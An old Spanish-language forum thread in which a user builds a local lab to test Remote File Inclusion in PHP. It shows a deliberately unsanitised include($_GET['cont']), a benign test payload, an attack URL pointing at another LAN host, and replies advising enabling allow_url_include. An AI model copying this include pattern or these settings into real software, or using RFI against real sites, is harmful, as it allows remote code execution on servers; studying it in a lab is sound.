elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  sigo con problemass....
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: sigo con problemass....  (Leído 1,947 veces)
R41N-W4R3

Desconectado Desconectado

Mensajes: 248


Ver Perfil
sigo con problemass....
« en: 10 Septiembre 2007, 16:05 pm »


 Tambien he probado a instalar el apache para windows... y me dice lo mismo. Voy a pegar aki todo el codigo de los 3 archivos a ver si alguien me puede ayudar....


  1. El archivo pruebarfi.html

 
Código:
<HTML><HEAD><TITLE> Prueva de RFI </TITLE></HEAD><BODY>

 <A HREF="rfi.php?cont=hola.html">Hola!</A><BR><BR>
<A HREF="rfi.php?cont=adios.html">Adios!</A>

 </BODY></HTML>

  2. El archivo hola.html...es igual q adios.html... osea solo escrito hola y adios

 
Código:
holaaaa
Código:
adiosssss

  3. El archivo rfi.php

 
Código:
<?php

$var = $_GET["cont"];
include($var);

?>

  4.- El archivo  cede.txt

 
Código:
<?phpecho "<h1>Vulnerable a RFI</h1>";?>

  y lo que paso en la url seria 
Código:
http://192.168.1.2/fri.php?cont=http://192.168.1.3/code.txt
 
  El error que me da es el q reporte arriba


 Gracias a todos 


En línea

дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.110


Ver Perfil WWW
Re: sigo con problemass....
« Respuesta #1 en: 10 Septiembre 2007, 16:18 pm »

Tienes firewall?. Seguro es eso.

Otra, qué error te tira? y modificaste el php.ini que lee el apache?

Suerte


En línea

R41N-W4R3

Desconectado Desconectado

Mensajes: 248


Ver Perfil
Re: sigo con problemass....
« Respuesta #2 en: 11 Septiembre 2007, 19:30 pm »



   Pues no se pq ya no salen los post anteriores... de todas formas lo acabo de solucionar.. aunke no se como jajajja   gracias por tu ayuda.

 El fallo q aparecia era debido a que me decia q el xamp no estaba bien configurado para URL include

Gracias
En línea

yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: sigo con problemass....
« Respuesta #3 en: 12 Septiembre 2007, 04:13 am »

Revisa tu archivo de configuración de PHP (php.ini) y asegúrate de que los siguientes opciones se encuentran activadas...

Citar
allow_url_fopen=on
allow_url_include=on
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sigo con htlm y css o migro a wordpress?
Desarrollo Web
seu230 1 1,574 Último mensaje 23 Junio 2011, 21:29 pm
por K-19
Por dónde sigo...
Programación C/C++
Alien-Z 7 2,921 Último mensaje 25 Agosto 2011, 19:34 pm
por ..:ALT3RD:..
¿Por donde sigo? « 1 2 »
Hacking
lMem-o-re 10 5,441 Último mensaje 26 Enero 2012, 21:43 pm
por skapunky
Sigo un curso que usa NB antiguio y me da problemas.
Java
DonPilin 3 2,867 Último mensaje 21 Abril 2023, 00:12 am
por sapito169
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines